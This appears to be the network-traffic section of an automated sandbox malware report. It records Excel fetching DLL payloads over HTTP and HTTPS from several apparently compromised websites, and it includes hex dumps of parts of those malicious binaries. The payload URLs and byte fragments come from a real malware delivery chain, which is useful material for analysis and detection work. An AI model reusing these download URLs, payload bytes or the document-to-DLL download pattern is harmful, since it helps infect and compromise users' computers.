                                                                            May 23, 2022 18:59:16.193351030 CEST8.8.8.8192.168.2.220x446fNo error (0)myphamcuatui.com103.1.238.211A (IP address)IN (0x0001)
                                                                            May 23, 2022 18:59:21.307275057 CEST8.8.8.8192.168.2.220x795No error (0)sieuthiphutungxenang.com112.213.89.85A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • newkano.com
                                                                            • myphamcuatui.com
                                                                            • ocalogullari.com
                                                                            • sieuthiphutungxenang.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.2249173103.45.230.202443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampkBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.2249175103.1.238.211443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampkBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.2249174188.132.217.10880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 23, 2022 18:59:11.392869949 CEST880OUTGET /inc/Wcm82enrs8/ HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: ocalogullari.com
                                                                            Connection: Keep-Alive
                                                                            May 23, 2022 18:59:11.466639996 CEST881INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Mon, 23 May 2022 16:59:09 GMT
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 850432
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.1.33
                                                                            Cache-Control: no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 23 May 2022 16:59:09 GMT
                                                                            Content-Disposition: attachment; filename="QqHRFPCw2sMluT.dll"
                                                                            Content-Transfer-Encoding: binary
                                                                            Set-Cookie: 628bbd5d143a6=1653325149; expires=Mon, 23-May-2022 17:00:09 GMT; Max-Age=60; path=/
                                                                            Last-Modified: Mon, 23 May 2022 16:59:09 GMT
                                                                            X-Powered-By: PleskLin
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 cf 78 03 b5 ae 16 50 b5 ae 16 50 b5 ae 16 50 c3 33 7b 50 b2 ae 16 50 c3 33 6d 50 a2 ae 16 50 b5 ae 17 50 b4 ac 16 50 92 68 6b 50 bd ae 16 50 92 68 7b 50 32 ae 16 50 92 68 78 50 37 ae 16 50 92 68 64 50 b3 ae 16 50 92 68 6c 50 b4 ae 16 50 92 68 6a 50 b4 ae 16 50 92 68 6e 50 b4 ae 16 50 52 69 63 68 b5 ae 16 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 a7 6f 8b 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 08 00 00 2c 05 00 00 ca 07 00 00 00 00 00 00 95 03 00 00 10 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 90 0d 00 00 04 00 00 b3 21 0d 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 dd 06 00 50 00 00 00 e8 b6 06 00 f0 00 00 00 00 e0 07 00 94 64 05 00 00 80 07 00 50 5e 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 00 0c 00 00 48 b6 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 2b 05 00 00 10 00 00 00 2c 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 9d 01 00 00 40 05 00 00 9e 01 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 94 00 00 00 e0 06 00 00 34 00 00 00 ce 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 50 5e 00 00 00 80 07 00 00 60 00 00 00 02 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 94 64 05 00 00 e0 07 00 00 66 05 00 00 62 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 30 00 00 00 50 0d 00 00 32 00 00 00 c8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xPPP3{PP3mPPPPhkPPh{P2PhxP7PhdPPhlPPhjPPhnPPRichPPEdob" ,! PdP^P@H@.textD+, `.rdatap@0@@.data4@.pdataP^`@@.rsrcdfb@@.reloc0P2@B
                                                                            May 23, 2022 18:59:11.466707945 CEST883INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 23, 2022 18:59:11.466763020 CEST884INData Raw: f0 4c 89 70 e8 4c 8b f1 48 8b 4a 20 4c 89 78 e0 48 8b da e8 7b b5 00 00 48 8d 53 28 48 8d 4c 24 50 48 8b e8 ff 15 19 37 05 00 8b 7b 08 41 bd 01 00 00 00 89 7c 24 68 ff 15 be 36 05 00 48 8b c8 e8 76 03 01 00 49 8b 4e 40 45 8b be d8 00 00 00 33 f6
                                                                            Data Ascii: LpLHJ LxH{HS(HL$PH7{A|$h6HvIN@E3I;HKL$KE3H$$$t$d$$$$$k6uIKu$$uut$`A
                                                                            May 23, 2022 18:59:11.466818094 CEST886INData Raw: 63 cb 7e 50 44 8b a4 24 b8 00 00 00 49 8d 3c 4f 66 c7 07 00 00 48 8b 4d 10 4c 8d 8c 24 88 00 00 00 44 8b c3 49 8b d7 ff 15 c4 27 05 00 44 8b 9c 24 88 00 00 00 43 8d 44 1c 0c 3b c6 7e 0b 83 eb 01 48 83 ef 02 85 db 7f c7 8b 7c 24 68 4c 8d 25 85 46
                                                                            Data Ascii: c~PD$I<OfHML$DI'D$CD;~H|$hL%FLNIqtMM3M;u$$tuD$P(D$P$fD$pl$xD$pHET$ LL$pAIHIN@AL$ Mc_0
                                                                            May 23, 2022 18:59:11.466900110 CEST887INData Raw: 44 24 30 33 d2 48 8b cb e8 d2 8f 00 00 8b 83 c8 00 00 00 39 44 24 38 7d 5c 48 8b d3 48 8d 4c 24 50 e8 9d ad 00 00 90 48 8d 54 24 20 48 8d 4c 24 50 e8 95 a2 00 00 44 8b 5c 24 38 41 83 c3 ff 8b 44 24 20 44 3b d8 41 0f 4c c3 89 44 24 20 8b 83 c8 00
                                                                            Data Ascii: D$03H9D$8}\HHL$PHT$ HL$PD\$8AD$ D;ALD$ D$(E3HT$ HK@=,HL$PHkH$H3mH[@UH HHMPH ]H(H\$@H|$HHHHtHO@+HXH;t
                                                                            May 23, 2022 18:59:11.466911077 CEST888INData Raw: 44 24 7c 7e c6 44 24 7d ba c6 44 24 7e 04 c6 44 24 7f 0a c6 84 24 80 00 00 00 7e c6 84 24 81 00 00 00 b9 c6 84 24 82 00 00 00 0e c6 84 24 83 00 00 00 30 c6 84 24 84 00 00 00 16 c6 84 24 85 00 00 00 e8 c6 84 24 86 00 00 00 27 c6 84 24 87 00 00 00
                                                                            Data Ascii: D$|~D$}D$~D$$~$$$0$$$'$8$x$$$@$$$$$4$$>$R$W$$\$$$$r$
                                                                            May 23, 2022 18:59:11.466919899 CEST889INData Raw: 35 c6 84 24 25 01 00 00 13 c6 84 24 26 01 00 00 95 c6 84 24 27 01 00 00 37 c6 84 24 28 01 00 00 e2 c6 84 24 29 01 00 00 04 c6 84 24 2a 01 00 00 18 c6 84 24 2b 01 00 00 19 c6 84 24 2c 01 00 00 2a c6 84 24 2d 01 00 00 66 c6 84 24 2e 01 00 00 f5 c6
                                                                            Data Ascii: 5$%$&$'7$($)$*$+$,*$-f$.$/7$0$1P$2=$3$4s$5$6$7<$8+$9$:$;$<
                                                                            May 23, 2022 18:59:11.466979027 CEST890INData Raw: dc c6 84 24 3d 01 00 00 1b c6 84 24 3e 01 00 00 1f c6 84 24 3f 01 00 00 5e c6 84 24 40 01 00 00 17 c6 84 24 41 01 00 00 f5 c6 84 24 42 01 00 00 1c c6 84 24 43 01 00 00 b3 c6 84 24 44 01 00 00 26 c6 84 24 45 01 00 00 00 c6 84 24 46 01 00 00 07 c6
                                                                            Data Ascii: $=$>$?^$@$A$B$C$D&$E$F$G$H$I($J$Kt$L[$M$NX$O$P$Q$Ru$SQ$T $U8$V$W$$X$Y$ZU
                                                                            May 23, 2022 18:59:11.467029095 CEST892INData Raw: 24 e4 01 00 00 f1 c6 84 24 e5 01 00 00 77 c6 84 24 e6 01 00 00 6d c6 84 24 e7 01 00 00 72 c6 84 24 e8 01 00 00 3a c6 84 24 e9 01 00 00 30 c6 84 24 ea 01 00 00 4f c6 84 24 eb 01 00 00 50 c6 84 24 ec 01 00 00 16 c6 84 24 ed 01 00 00 ec c6 84 24 ee
                                                                            Data Ascii: $$w$m$r$:$0$O$P$$$>$t$$6$e$$%$$$$$>$V$F$?$$$$w$A$
                                                                            May 23, 2022 18:59:11.467077017 CEST893INData Raw: 00 00 73 c6 84 24 8c 02 00 00 a6 c6 84 24 8d 02 00 00 97 c6 84 24 8e 02 00 00 1a c6 84 24 8f 02 00 00 f9 c6 84 24 90 02 00 00 3e c6 84 24 91 02 00 00 52 c6 84 24 92 02 00 00 47 c6 84 24 93 02 00 00 25 c6 84 24 94 02 00 00 c2 c6 84 24 95 02 00 00
                                                                            Data Ascii: s$$$$$>$R$G$%$$E$$7$$$$$r$$k$$$$$P$0$s$$t$@$
                                                                            May 23, 2022 18:59:11.522336006 CEST895INData Raw: c6 84 24 33 03 00 00 98 c6 84 24 34 03 00 00 10 c6 84 24 35 03 00 00 39 c6 84 24 36 03 00 00 24 c6 84 24 37 03 00 00 04 c6 84 24 38 03 00 00 ad c6 84 24 39 03 00 00 15 c6 84 24 3a 03 00 00 9c c6 84 24 3b 03 00 00 1c c6 84 24 3c 03 00 00 30 c6 84
                                                                            Data Ascii: $3$4$59$6$$7$8$9$:$;$<0$=b$>$?$@$A$B!$C$D$E$F$G$H$I$JQ$K$Lr$M$N4$O$P$Q


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.2249176112.213.89.8580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 23, 2022 18:59:21.525721073 CEST2631OUTGET /old_source/9boJQZpTSdQE/ HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: sieuthiphutungxenang.com
                                                                            Connection: Keep-Alive
                                                                            May 23, 2022 18:59:21.760535955 CEST2633INHTTP/1.1 200 OK
                                                                            Connection: Keep-Alive
                                                                            Keep-Alive: timeout=5, max=100
                                                                            x-powered-by: PHP/5.6.40
                                                                            set-cookie: 628bbd675e0bb=1653325159; expires=Mon, 23-May-2022 17:00:19 GMT; Max-Age=60; path=/
                                                                            cache-control: no-cache, must-revalidate
                                                                            pragma: no-cache
                                                                            last-modified: Mon, 23 May 2022 16:59:19 GMT
                                                                            expires: Mon, 23 May 2022 16:59:19 GMT
                                                                            content-type: application/x-msdownload
                                                                            content-disposition: attachment; filename="4bP.dll"
                                                                            content-transfer-encoding: binary
                                                                            content-length: 850432
                                                                            date: Mon, 23 May 2022 16:59:19 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 cf 78 03 b5 ae 16 50 b5 ae 16 50 b5 ae 16 50 c3 33 7b 50 b2 ae 16 50 c3 33 6d 50 a2 ae 16 50 b5 ae 17 50 b4 ac 16 50 92 68 6b 50 bd ae 16 50 92 68 7b 50 32 ae 16 50 92 68 78 50 37 ae 16 50 92 68 64 50 b3 ae 16 50 92 68 6c 50 b4 ae 16 50 92 68 6a 50 b4 ae 16 50 92 68 6e 50 b4 ae 16 50 52 69 63 68 b5 ae 16 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 a7 6f 8b 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 08 00 00 2c 05 00 00 ca 07 00 00 00 00 00 00 95 03 00 00 10 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 90 0d 00 00 04 00 00 b3 21 0d 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 dd 06 00 50 00 00 00 e8 b6 06 00 f0 00 00 00 00 e0 07 00 94 64 05 00 00 80 07 00 50 5e 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 00 0c 00 00 48 b6 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 2b 05 00 00 10 00 00 00 2c 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 9d 01 00 00 40 05 00 00 9e 01 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 94 00 00 00 e0 06 00 00 34 00 00 00 ce 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 50 5e 00 00 00 80 07 00 00 60 00 00 00 02 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 94 64 05 00 00 e0 07 00 00 66 05 00 00 62 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 30 00 00 00 50 0d 00 00 32 00 00 00 c8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xPPP3{PP3mPPPPhkPPh{P2PhxP7PhdPPhlPPhjPPhnPPRichPPEdob" ,! PdP^P@H@.textD+, `.rdatap@0@@.data4@.pdataP^`@@.rsrcdfb@@.reloc0P2@B
                                                                            May 23, 2022 18:59:21.760565042 CEST2634INData Raw: 68 f0 4c 89 70 e8 4c 8b f1 48 8b 4a 20 4c 89 78 e0 48 8b da e8 7b b5 00 00 48 8d 53 28 48 8d 4c 24 50 48 8b e8 ff 15 19 37 05 00 8b 7b 08 41 bd 01 00 00 00 89 7c 24 68 ff 15 be 36 05 00 48 8b c8 e8 76 03 01 00 49 8b 4e 40 45 8b be d8 00 00 00 33
                                                                            Data Ascii: hLpLHJ LxH{HS(HL$PH7{A|$h6HvIN@E3I;HKL$KE3H$$$t$d$$$$$k6uIKu$$uut$`A
                                                                            May 23, 2022 18:59:21.760586023 CEST2635INData Raw: 48 63 cb 7e 50 44 8b a4 24 b8 00 00 00 49 8d 3c 4f 66 c7 07 00 00 48 8b 4d 10 4c 8d 8c 24 88 00 00 00 44 8b c3 49 8b d7 ff 15 c4 27 05 00 44 8b 9c 24 88 00 00 00 43 8d 44 1c 0c 3b c6 7e 0b 83 eb 01 48 83 ef 02 85 db 7f c7 8b 7c 24 68 4c 8d 25 85
                                                                            Data Ascii: Hc~PD$I<OfHML$DI'D$CD;~H|$hL%FLNIqtMM3M;u$$tuD$P(D$P$fD$pl$xD$pHET$ LL$pAIHIN@AL$ Mc_0
                                                                            May 23, 2022 18:59:21.760607004 CEST2637INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 23, 2022 18:59:21.760629892 CEST2638INData Raw: 8d 44 24 30 33 d2 48 8b cb e8 d2 8f 00 00 8b 83 c8 00 00 00 39 44 24 38 7d 5c 48 8b d3 48 8d 4c 24 50 e8 9d ad 00 00 90 48 8d 54 24 20 48 8d 4c 24 50 e8 95 a2 00 00 44 8b 5c 24 38 41 83 c3 ff 8b 44 24 20 44 3b d8 41 0f 4c c3 89 44 24 20 8b 83 c8
                                                                            Data Ascii: D$03H9D$8}\HHL$PHT$ HL$PD\$8AD$ D;ALD$ D$(E3HT$ HK@=,HL$PHkH$H3mH[@UH HHMPH ]H(H\$@H|$HHHHtHO@+HXH;
                                                                            May 23, 2022 18:59:21.760653973 CEST2639INData Raw: c6 44 24 7c 7e c6 44 24 7d ba c6 44 24 7e 04 c6 44 24 7f 0a c6 84 24 80 00 00 00 7e c6 84 24 81 00 00 00 b9 c6 84 24 82 00 00 00 0e c6 84 24 83 00 00 00 30 c6 84 24 84 00 00 00 16 c6 84 24 85 00 00 00 e8 c6 84 24 86 00 00 00 27 c6 84 24 87 00 00
                                                                            Data Ascii: D$|~D$}D$~D$$~$$$0$$$'$8$x$$$@$$$$$4$$>$R$W$$\$$$$r$
                                                                            May 23, 2022 18:59:21.760675907 CEST2641INData Raw: 00 35 c6 84 24 25 01 00 00 13 c6 84 24 26 01 00 00 95 c6 84 24 27 01 00 00 37 c6 84 24 28 01 00 00 e2 c6 84 24 29 01 00 00 04 c6 84 24 2a 01 00 00 18 c6 84 24 2b 01 00 00 19 c6 84 24 2c 01 00 00 2a c6 84 24 2d 01 00 00 66 c6 84 24 2e 01 00 00 f5
                                                                            Data Ascii: 5$%$&$'7$($)$*$+$,*$-f$.$/7$0$1P$2=$3$4s$5$6$7<$8+$9$:$;$<$=$>$?^$@$A$B
                                                                            May 23, 2022 18:59:21.760699034 CEST2642INData Raw: 0b c6 84 24 1b 03 00 00 34 c6 84 24 1c 03 00 00 f7 c6 84 24 1d 03 00 00 37 c6 84 24 1e 03 00 00 72 c6 84 24 1f 03 00 00 6c c6 84 24 20 03 00 00 36 c6 84 24 21 03 00 00 57 c6 84 24 22 03 00 00 2a c6 84 24 23 03 00 00 2c c6 84 24 24 03 00 00 95 c6
                                                                            Data Ascii: $4$$7$r$l$ 6$!W$"*$#,$$$%6$&V$'$($)$*,$+e$,v$-$.J$/$0-$1$2s$3$4$59$6$$7$8
                                                                            May 23, 2022 18:59:21.760725021 CEST2643INData Raw: 84 24 cc 01 00 00 03 c6 84 24 cd 01 00 00 63 c6 84 24 ce 01 00 00 97 c6 84 24 cf 01 00 00 9e c6 84 24 d0 01 00 00 b9 c6 84 24 d1 01 00 00 18 c6 84 24 d2 01 00 00 bb c6 84 24 d3 01 00 00 3f c6 84 24 d4 01 00 00 72 c6 84 24 d5 01 00 00 00 c6 84 24
                                                                            Data Ascii: $$c$$$$$$?$r$$,$$$g$j$:$$2$S$E$$$$r$$w$m$r$:$0$
                                                                            May 23, 2022 18:59:21.760751009 CEST2645INData Raw: 02 00 00 45 c6 84 24 74 02 00 00 b7 c6 84 24 75 02 00 00 25 c6 84 24 76 02 00 00 c6 c6 84 24 77 02 00 00 44 c6 84 24 78 02 00 00 16 c6 84 24 79 02 00 00 5a c6 84 24 7a 02 00 00 7a c6 84 24 7b 02 00 00 be c6 84 24 7c 02 00 00 04 c6 84 24 7d 02 00
                                                                            Data Ascii: E$t$u%$v$wD$x$yZ$zz${$|$}r$~$t$g$p$[$a$o$P$x$$$$D$s$$$$$>$
                                                                            May 23, 2022 18:59:21.980911970 CEST2647INData Raw: 00 30 c6 84 24 6a 04 00 00 54 c6 84 24 6b 04 00 00 32 c6 84 24 6c 04 00 00 59 c6 84 24 6d 04 00 00 0b c6 84 24 6e 04 00 00 d9 c6 84 24 6f 04 00 00 aa c6 84 24 70 04 00 00 8d c6 84 24 71 04 00 00 23 c6 84 24 72 04 00 00 77 c6 84 24 73 04 00 00 28
                                                                            Data Ascii: 0$jT$k2$lY$m$n$o$p$q#$rw$s($t$uW$v3$w:$x$y$z${$|$}u$~$$*$I$&$$$;$}$


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.2249173103.45.230.202443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampkBytes transferredDirectionData
                                                                            2022-05-23 16:59:07 UTC0OUTGET /wp-admin/66rIsrVwoPKUsjcAs/ HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: newkano.com
                                                                            Connection: Keep-Alive
                                                                            2022-05-23 16:59:07 UTC0INHTTP/1.1 200 OK
                                                                            Date: Mon, 23 May 2022 16:59:03 GMT
                                                                            Server: Apache/2
                                                                            Cache-Control: no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 23 May 2022 16:59:03 GMT
                                                                            Content-Disposition: attachment; filename="LeBuXD3cUkeiPrfy.dll"
                                                                            Content-Transfer-Encoding: binary
                                                                            Set-Cookie: 628bbd57a97c3=1653325143; expires=Mon, 23-May-2022 17:00:03 GMT; Max-Age=60; path=/
                                                                            Last-Modified: Mon, 23 May 2022 16:59:03 GMT
                                                                            Content-Length: 850432
                                                                            Vary: Accept-Encoding,User-Agent
                                                                            Connection: close
                                                                            Content-Type: application/x-msdownload
                                                                            2022-05-23 16:59:07 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 cf 78 03 b5 ae 16 50 b5 ae 16 50 b5 ae 16 50 c3 33 7b 50 b2 ae 16 50 c3 33 6d 50 a2 ae 16 50 b5 ae 17 50 b4 ac 16 50 92 68 6b 50 bd ae 16 50 92 68 7b 50 32 ae 16 50 92 68 78 50 37 ae 16 50 92 68 64 50 b3 ae 16 50 92 68 6c 50 b4 ae 16 50 92 68 6a 50 b4 ae 16 50 92 68 6e 50 b4 ae 16 50 52 69 63 68 b5 ae 16 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xPPP3{PP3mPPPPhkPPh{P2PhxP7PhdPPhlPPhjPPhnPPRichP
                                                                            2022-05-23 16:59:07 UTC8INData Raw: 3b 01 00 00 15 c6 84 24 3c 01 00 00 dc c6 84 24 3d 01 00 00 1b c6 84 24 3e 01 00 00 1f c6 84 24 3f 01 00 00 5e c6 84 24 40 01 00 00 17 c6 84 24 41 01 00 00 f5 c6 84 24 42 01 00 00 1c c6 84 24 43 01 00 00 b3 c6 84 24 44 01 00 00 26 c6 84 24 45 01 00 00 00 c6 84 24 46 01 00 00 07 c6 84 24 47 01 00 00 15 c6 84 24 48 01 00 00 b0 c6 84 24 49 01 00 00 28 c6 84 24 4a 01 00 00 bb c6 84 24 4b 01 00 00 74 c6 84 24 4c 01 00 00 5b c6 84 24 4d 01 00 00 1d c6 84 24 4e 01 00 00 58 c6 84 24 4f 01 00 00 f4 c6 84 24 50 01 00 00 0c c6 84 24 51 01 00 00 aa c6 84 24 52 01 00 00 75 c6 84 24 53 01 00 00 51 c6 84 24 54 01 00 00 20 c6 84 24 55 01 00 00 38 c6 84 24 56 01 00 00 99 c6 84 24 57 01 00 00 24 c6 84 24 58 01 00 00 d2 c6 84 24 59 01 00 00 17 c6 84 24 5a 01 00 00 55 c6 84
                                                                            Data Ascii: ;$<$=$>$?^$@$A$B$C$D&$E$F$G$H$I($J$Kt$L[$M$NX$O$P$Q$Ru$SQ$T $U8$V$W$$X$Y$ZU
                                                                            2022-05-23 16:59:08 UTC8INData Raw: 24 7e 01 00 00 89 c6 84 24 7f 01 00 00 11 c6 84 24 80 01 00 00 26 c6 84 24 81 01 00 00 1e c6 84 24 82 01 00 00 33 c6 84 24 83 01 00 00 b1 c6 84 24 84 01 00 00 32 c6 84 24 85 01 00 00 b9 c6 84 24 86 01 00 00 2b c6 84 24 87 01 00 00 64 c6 84 24 88 01 00 00 74 c6 84 24 89 01 00 00 07 c6 84 24 8a 01 00 00 f1 c6 84 24 8b 01 00 00 76 c6 84 24 8c 01 00 00 91 c6 84 24 8d 01 00 00 3c c6 84 24 8e 01 00 00 55 c6 84 24 8f 01 00 00 44 c6 84 24 90 01 00 00 2a c6 84 24 91 01 00 00 97 c6 84 24 92 01 00 00 1b c6 84 24 93 01 00 00 bd c6 84 24 94 01 00 00 05 c6 84 24 95 01 00 00 3e c6 84 24 96 01 00 00 64 c6 84 24 97 01 00 00 12 c6 84 24 98 01 00 00 30 c6 84 24 99 01 00 00 f7 c6 84 24 9a 01 00 00 21 c6 84 24 9b 01 00 00 d2 c6 84 24 9c 01 00 00 3b c6 84 24 9d 01 00 00 2f c6
                                                                            Data Ascii: $~$$&$$3$$2$$+$d$t$$$v$$<$U$D$*$$$$$>$d$$0$$!$$;$/
                                                                            2022-05-23 16:59:08 UTC16INData Raw: c6 84 24 7f 05 00 00 81 c6 84 24 80 05 00 00 a7 c6 84 24 81 05 00 00 25 c6 84 24 82 05 00 00 6c c6 84 24 83 05 00 00 c8 c6 84 24 84 05 00 00 7e c6 84 24 85 05 00 00 49 c6 84 24 86 05 00 00 c7 c6 84 24 87 05 00 00 3c c6 84 24 88 05 00 00 cc c6 84 24 89 05 00 00 76 c6 84 24 8a 05 00 00 33 c6 84 24 8b 05 00 00 30 c6 84 24 8c 05 00 00 43 c6 84 24 8d 05 00 00 18 c6 84 24 8e 05 00 00 d5 c6 84 24 8f 05 00 00 2e c6 84 24 90 05 00 00 5a c6 84 24 91 05 00 00 11 c6 84 24 92 05 00 00 89 c6 84 24 93 05 00 00 77 c6 84 24 94 05 00 00 56 c6 84 24 95 05 00 00 30 c6 84 24 96 05 00 00 64 c6 84 24 97 05 00 00 73 c6 84 24 98 05 00 00 e1 c6 84 24 99 05 00 00 43 c6 84 24 9a 05 00 00 62 c6 84 24 9b 05 00 00 72 c6 84 24 9c 05 00 00 72 c6 84 24 9d 05 00 00 37 c6 84 24 9e 05 00 00
                                                                            Data Ascii: $$$%$l$$~$I$$<$$v$3$0$C$$$.$Z$$$w$V$0$d$s$$C$b$r$r$7$
